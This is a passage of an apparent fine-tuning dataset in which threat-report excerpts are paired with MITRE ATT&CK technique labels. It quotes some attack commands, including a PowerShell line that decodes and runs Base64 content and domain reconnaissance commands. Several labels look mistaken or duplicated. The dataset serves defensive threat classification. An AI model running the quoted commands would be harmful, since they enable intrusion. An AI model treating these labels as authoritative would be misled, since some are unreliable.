Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Screenshot: takes system screenshots and saves them to %AppData% before sending them to the C2 via a POST request" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed has the ability to rename its payload to ESTCommon.dll to masquerade as a DLL belonging to ESTsecurity." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Unlike recent variants of Mirai and Gafgyt that target vulnerable Linux systems via randomly generated IP addresses, Xbash also scans and trawls through domain names. The C&C scans for specific destinations’ known vulnerabilities in Hadoop, Redis and ActiveMQ (CVE-2016-3088) for self-propagation. Hadoop’s unauthenticated command execution flaw discovered in October 2016, as well as the Redis arbitrary and remote command execution vulnerability disclosed in October 2015, have yet to be assigned CVE numbers. Based on the active C&C traffic, it scans and probes for open TCP or UDP ports such as HTTP, VNC, MySQL/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. While the malware uses a weak username and password dictionary to brute force itself into the service, it is also able to update its set from the C&C server, delete all the databases, and display the ransom message" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "STARWHALE has the ability to execute commands via `cmd.exe`." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RunningRAT gathers the OS version, logical drives information, processor information, and volume information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses command line for execution." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script using the following command line: powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\\\ProgramData\\\\WindowsDefender.ini) The rest of the malicious activities are performed by the PowerShell Script" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0015, the threat actors use the command `net group \"domain admins\" /dom` to enumerate domain groups." }, { "role": "assistant", "content": "T1069.002 - Permission Groups Discovery: Domain Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke has used shell scripts which download mining executables and saves them with the filename \"java\"." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can use the `GetRegValue` function to check Registry keys within `HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated` and `HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated`. It also contains additional modules that can check software AutoRun values and use the Win32 namespace to get values from HKCU, HKLM, HKCR, and HKCC hives." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware checks the language of the machine with function “GetUserDefaultUILanguage” and saves the value in the stack; it is not checked automatically after the call, but it is important later" }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Resolves WINAPI functions 2) Hides its GUI using ShowWindow WINAPI call 3) Compares if the DLL is being ran by wmplayer" }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DustySky has used both HTTP and HTTPS for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "\"beacon\" payload can collect information on process details." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RDAT can issue SOAP requests to delete already processed C2 emails. RDAT can also delete itself from the infected system." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To operate and evade standard analysis tools, most of the functions are hashed" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bundlore uses HTTP requests for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has aggregated collected credentials in text files before exfiltrating." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Spark has used a custom XOR algorithm to decrypt the payload." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "establishes persistence under the Registry key HKCU\\Software\\Run auto_update." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpeakUp downloads and executes additional files from a remote server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Naid collects a unique identifier (UID) from a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Helminth relies on the following shortcut for persistence, as it runs the Trojan each time the system starts using the following command line" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SoreFang can collect the TCP/IP, DNS, DHCP, and network adapter configuration on a compromised host via \"ipconfig.exe /all\"." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuasarRAT can perform webcam viewing." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Next, BoomBox downloads an encrypted file from Dropbox. For demonstration purposes, an example HTTP(s) POST request used to download the encrypted file from Dropbox is shown below" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers the current domain the victim system belongs to." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "There are likely differences in the Skeleton Key malware documented by Dell SecureWorks and the Mimikatz skeleton key functionality. If all the DCs don’t have skeleton key configured, the master password won’t work when the client authenticates to a DC without skeleton key. Scenario: Either the attacker exploits MS14-068 or has the KRBTGT NTLM password hash and uses it to generate a Kerberos Golden Ticket to impersonate a valid Domain Admin account. Domain Controller Security Events When Implanting the Mimikatz Skeleton Key: When implanting the skeleton key remotely using Mimikatz the following events are logged on the Domain Controller. Authenticating with the Mimikatz Skeleton Key: Testing user password and user account with skeleton key password. Note that both passwords are accepted – the valid user password and the skeleton key master password. Testing Domain Admin account with password & skeleton key password. Note that both passwords are accepted – the valid user password and the skeleton key master password. Skeleton Key Mitigation: - Protect domain-level admin (DLA) accounts (Domain Admin, Administrators, etc) which reduces the risk of attackers gaining access to these credentials. Don’t let DLA accounts logon to systems at a different security level from Domain Controllers" }, { "role": "assistant", "content": "T1098 - Account Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can capture a screenshot from a victim." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GeminiDuke uses HTTP and HTTPS for command and control." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Higaisa sent the victim computer identifier in a User-Agent string back to the C2 server every 10 minutes." }, { "role": "assistant", "content": "T1029 - Scheduled Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mofang's spearphishing emails required a user to click the link to connect to a compromised website." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Brave Prince gathers file and directory information from the victim’s machine." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This thread searches for for files with the following extensions on fixed drives and sends them to C2 every 60 minutes" }, { "role": "assistant", "content": "T1020 - Automated Exfiltration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackEnergy has run a keylogger plug-in on a victim." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pandora can communicate over HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During CostaRicto, the threat actors obtained open source tools to use in their operations." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The QuietSieve malware family refers to a series of heavily-obfuscated .NET binaries specifically designed to steal information from the target host. If this check succeeds, a randomly-generated alphanumeric prefix is created and combined with the callback domain as a subdomain before an initial request is made over HTTPS" }, { "role": "assistant", "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee has the ability to search for designated file paths and Registry keys that indicate a virtualized environment from multiple products." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PcShare can search the registry files of a compromised host." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When the backdoor is configured to use HTTPS to communicate with the C2, the functionality is largely the same as when in HTTP mode. The differences are that it lacks the options to update a session key due to encryption being handled by the TLS layer and it also does not have the option to send data to and from the C2 in the chunking mode previously described. In addition, only one transmission is made to the C2 when the malware is establishing a connection as there is no exchange of an AES session key. The hello message that is sent contains the same plaintext data as the HTTP mode" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attackers manually send a command to the JS or C# component to drop and execute a batch file from one of their servers. That batch file writes a malicious INF file and supplies it as a parameter to the Microsoft utility cmstp.exe, which executes a remote scriptlet specified in the INF file. The remote scriptlet contains obfuscated JS code that drops an OCX file and executes it via regsvr32.exe" }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Catchamas steals data stored in the clipboard." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can perform pass the hash." }, { "role": "assistant", "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Egregor has checked for the LogMein event log in an attempt to encrypt files in remote machines." }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Net Crawler uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attachment itself is an Microsoft Excel XLS document that contains malicious macro script. The document presents itself as a standard macro document but has all of its text hidden until the victim enables macros. Notably, all of the content text is accessible to the victim even before macros are enabled. However, a white font color is applied to the text to make it appear that the victim must enable macros to access the content. Once the macro is enabled, the content is presented via the following code: ActiveSheet.Range(\"a1:c54\").Font.Color = vbBlack The code above changes the font color to black within the specified cell range and presents the content to the user. On initial inspection, the content appears to be the expected legitimate content, however, closer examination of the document shows several abnormal artifacts that would not exist in a legitimate document. Figure 2 below shows how the delivery document initially looks and the transformation the content undergoes as the macro runs" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN5, which earlier this year was profiled by researchers at Trend Micro and has been in action since at least 2008, uses real credentials from the victim organization's virtual private network, Remote Desktop Protocol, Citrix, or VNC. Vengerik says the attackers got those credentials via third parties associated with the victims' POS systems" }, { "role": "assistant", "content": "T1078 - Valid Accounts', 'T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT can execute \"getinfo\" to discover the current time on a compromised host." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PolyglotDuke can use \"LoadLibraryW\" and \"CreateProcess\" to load and execute code." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mythic supports custom chunk sizes used to upload/download files." }, { "role": "assistant", "content": "T1030 - Data Transfer Size Limits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which issues an HTTP POST requests that appears as" }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has run \"net use\" to connect to network shares." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can open an interactive command-shell to perform command line functions on victim machines." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware will collect data from the victim machine and write this information to LOCALAPPDATA%\\MicroSoft Updatea\\uplog.tmp. The following information is collected from the victim" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In 2018 Intezer covered Foudre version 8, which contained a certain sample labeled unknown binary that was not explored in Intezer’s research. In fact, this was a new component — called Tonnerre — which was a new step in the evolution of Infy, and contained various functionality absent from Foudre alone." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used code-signing certificates on its malware that are either forged due to weak keys or stolen." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "employs the same encoding scheme as for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WellMess can send files from the victim machine to C2." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "First, just like the Gh0st in the dshell paper from SANS, the decrypted protocol consists of a 5 byte header (ngLGX), a 4byte packet length field, and finally another 4 byte uncompressed length field. This is where the similarity ends as the Opcode and the data are compressed using ZLib, instead of just the data. Additionally, the entire packet is encrypted with an algorithm making visual analysis of the Wireshark data challenging. However, as the packet header is static, you can use the encrypted header as an identifier, like I did in my script. The encrypted header is: “\\xEA\\xEE\\xCC\\xD3\\xB8” and is unchanged throughout the malware’s runthrough" }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak has returned C2 data as encoded ASCII." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Janicab’s features also remind us of Powersing’s: the sample contains VM detection based on the MAC address of the machine, looks for malware analysis programs and has familiar antivirus software evasion routines. Janicab also periodically sends screenshot captures of the victim’s desktop to the C&C and appears to enable the execution of arbitrary Python scripts." }, { "role": "assistant", "content": "T1113 - Screen Capture', 'T1497 - Virtualization/Sandbox Evasion', 'T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SVR leveraged access gained from the SolarWinds campaign to compromise a certificate issued by Mimecast, which it then used to authenticate a subset of Mimecast's products with customer systems." }, { "role": "assistant", "content": "T1199 - Trusted Relationship" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server." }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The ransomware payload is copied to an Active Directory Domain Controller and deployed to systems using the Default Domain Group Policy Object" }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DOMAIN} nltest /domain_trusts /all_trusts net share route print netstat -nao net localgroup qwinsta WMI Query ROOT\\CIMV2:Win32_BIOS WMI Query ROOT\\CIMV2:Win32_DiskDrive WMI Query ROOT\\CIMV2:Win32_PhysicalMemory WMI Query ROOT\\CIMV2:Win32_Product WMI Query ROOT\\CIMV2:Win32_PnPEntity - whoami /all - arp -a - ipconfig /all - net view /all - cmd /c set - - nltest /domain_trusts /all_trusts - net share - route print - netstat -nao - net localgroup - qwinsta - WMI Query ROOT\\CIMV2:Win32_BIOS - WMI Query ROOT\\CIMV2:Win32_DiskDrive - WMI Query ROOT\\CIMV2:Win32_PhysicalMemory - WMI Query ROOT\\CIMV2:Win32_Product - WMI Query ROOT\\CIMV2:Win32_PnPEntity" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Resulting script on the compromised government websites Users were redirected to https://google-updata[.]tk:443/hook.js, a BEeF instance, and https://windows-updata[.]tk:443/scanv1.8/i/?1, an empty ScanBox instance that answered a small piece of JavaScript code" }, { "role": "assistant", "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A service that ensures Carbon’s persistency is created. Its name can either be “srservice”, “ipvpn” or “hkmsvc” depending of the operating system version running on the compromised machine" }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team's BCS-server tool uses base64 encoding and HTML tags for the communication traffic between the C2 server." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DustySky searches for network drives and removable media and duplicates itself onto them." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec contains a keylogger component." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Evidence also supports the hypothesis that there is a encryption plugin for victim files (see below)" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hydraq creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "downloads and executes additional PowerShell code and Windows binaries." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can use Python to perform execution." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gold Dragon can download additional components from the C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Another component used by this group is a variant of 